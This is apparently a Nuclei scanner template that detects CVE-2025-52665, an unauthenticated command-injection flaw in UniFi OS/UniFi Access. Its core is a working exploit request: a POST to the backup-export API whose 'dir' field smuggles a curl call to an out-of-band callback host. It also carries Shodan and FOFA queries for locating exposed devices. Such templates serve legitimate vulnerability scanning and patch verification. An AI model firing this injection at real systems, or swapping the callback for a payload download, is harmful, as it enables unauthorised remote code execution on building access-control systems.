id: CVE-2025-52665
info:
name: UniFi Access - Broken Access Control
author: theamanrawat,DhiyaneshDK
severity: critical
description: |
UniFi Access Application 3.3.22 through 3.4.31 contains a broken authentication caused by misconfiguration exposing management API without proper authentication, letting attackers on management network access management functions, exploit requires network access.
impact: |
Attackers on the management network can access management APIs without authentication, potentially leading to unauthorized control of the system.
remediation: |
Update to version 4.0.21 or later.
reference:
- https://community.ui.com/releases/Security-Advisory-Bulletin-056-056/ce97352d-91cd-40a7-a2f4-2c73b3b30191
- https://www.catchify.sa/post/cve-2025-52665-rce-in-unifi-os-25-000
- https://nvd.nist.gov/vuln/detail/CVE-2025-52665
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10
cve-id: CVE-2025-52665
epss-score: 0.08394
epss-percentile: 0.91937
cwe-id: CWE-306
metadata:
max-request: 2
verified: false
shodan-query: http.html:"UniFi OS"
fofa-query: body="UniFi OS"
tags: cve,cve2025,unifi,rce,vuln
flow: http(1) && http(2)
variables:
rand_string: '{{to_lower(rand_text_alpha(6))}}'
http:
- raw:
- |
GET /login HTTP/1.1
Host: {{Hostname}}
host-redirects: true
max-redirects: 2
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains_any(body, "UniFi OS","UniFi Dream Machine SE")'
condition: and
internal: true
- raw:
- |
@Host: {{Hostname}}:9780
POST /api/ucore/backup/export HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{
"dir":"/tmp/{{rand_string}}-; curl http://{{interactsh-url}}/; #"
}
matchers:
- type: word
part: interactsh_protocol
words:
- "dns"
# digest: 4a0a00473045022100dcaeefce1824e3ba832a74471005ca46cd756ada1c22d51459132e3470e49d6e022032e9dc4d02655d230f31ee5954aec620e221a7be7a4078e5e17aac7958050e3a:922c64590222798bb761d5b6d8e72950